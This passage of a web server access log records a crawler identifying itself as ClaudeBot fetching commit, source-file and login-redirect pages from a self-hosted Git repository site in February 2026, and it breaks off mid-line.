[Client 216.73.216.188] [Length 16606] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/1.conf" [Client 216.73.216.188] [Length 12941] [Gzip 4.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/.gitignore" [Client 216.73.216.188] [Length 119] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/tsconfig.json" [Client 216.73.216.188] [Length 11853] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_access.log" [Client 216.73.216.188] [Length 15924] [Gzip 7.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/README.md" [Client 216.73.216.188] [Length 11315] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.tsx" [Client 216.73.216.188] [Length 11578] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d" [Client 216.73.216.188] [Length 15821] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.html" [Client 216.73.216.188] [Length 30966] [Gzip 9.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/update_status.py" [Client 216.73.216.188] [Length 9777] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/4.conf" [Client 216.73.216.188] [Length 12736] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/update_status.py" [Client 216.73.216.188] [Length 808] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_access.log" [Client 216.73.216.188] [Length 12149] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/nginx-reverse-proxy.conf?display=rendered" [Client 216.73.216.188] [Length 11088] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.gitignore?display=source" [Client 216.73.216.188] [Length 11348] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_access.log" [Client 216.73.216.188] [Length 16335] [Gzip 6.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?state=closed&type=all" [Client 216.73.216.188] [Length 9953] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 10853] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.fish" [Client 216.73.216.188] [Length 13489] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 216.73.216.188] [Length 10872] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommit%2F18fa480c84b358da8bf50d54057f53591759225f" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fbranch%2Fmain" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-2.conf" [Client 216.73.216.188] [Length 11671] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 10852] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fissues" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/dotenv" [Client 216.73.216.188] [Length 11504] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2F.Backup" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/assetpilot.ico" [Client 216.73.216.188] [Length 10804] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fnginx-reverse-proxy.conf" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate" [Client 216.73.216.188] [Length 12965] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/lib64" [Client 216.73.216.188] [Length 11007] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2FDockerfile" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Freleases" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec" [Client 216.73.216.188] [Length 387800] [Gzip 13.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/normalizer" [Client 216.73.216.188] [Length 11521] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fprojects" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/mail_contact.py?display=rendered" [Client 216.73.216.188] [Length 11102] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommit%2F3181052619700dceeeef81a9a0851130498f177e" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?style=split&whitespace=show-all" [Client 216.73.216.188] [Length 234319] [Gzip 16.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 216.73.216.188] [Length 14271] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 216.73.216.188] [Length 15740] [Gzip 5.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?state=all&type=all" [Client 216.73.216.188] [Length 10086] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fhtml" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fdocker-compose.yml" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/.gitignore" [Client 216.73.216.188] [Length 11465] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" [Client 216.73.216.188] [Length 11566] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f?style=split&whitespace=show-all" [Client 216.73.216.188] [Length 17199] [Gzip 3.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/claude.md" [Client 216.73.216.188] [Length 13396] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fwiki" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2Fasset_pilot_docker" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?style=split&whitespace=show-all" [Client 216.73.216.188] [Length 120354] [Gzip 14.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" [Client 216.73.216.188] [Length 11372] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Factions" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fbranches" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2?style=split&whitespace=show-all" [Client 216.73.216.188] [Length 24348] [Gzip 5.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fpulls" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3?style=unified&whitespace=show-all" [Client 216.73.216.188] [Length 60711] [Gzip 8.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/mail_contact.py" [Client 216.73.216.188] [Length 15635] [Gzip 4.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" [Client 216.73.216.188] [Length 11754] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3?style=unified&whitespace=ignore-eol" [Client 216.73.216.188] [Length 60550] [Gzip 8.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fbranch%2Fmain%2FOpcUaMinimal" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fpackages" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2F.gitignore" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/mail_contact.py" [Client 216.73.216.188] [Length 1597] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?state=closed&type=all" [Client 216.73.216.188] [Length 10122] [Gzip 3.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/nginx.conf?display=rendered" [Client 216.73.216.188] [Length 11061] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup" -[15/Feb/2026:08:12:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.tsx" [Client 216.73.216.188] [Length 11618] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/mail_contact.py" [Client 